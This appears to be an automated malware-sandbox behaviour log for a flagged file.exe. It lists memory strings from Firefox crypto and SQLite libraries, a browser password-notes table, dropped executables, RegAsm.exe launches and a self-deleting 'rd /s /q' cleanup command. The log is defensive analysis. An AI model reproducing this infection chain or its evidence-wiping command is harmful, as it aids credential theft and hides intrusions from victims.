Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: BGIJJK.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KKJEBAAECB.exe "C:\ProgramData\KKJEBAAECB.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJKJJJECFI.exe "C:\ProgramData\KJKJJJECFI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KKJEBAAECB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KJKJJJECFI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

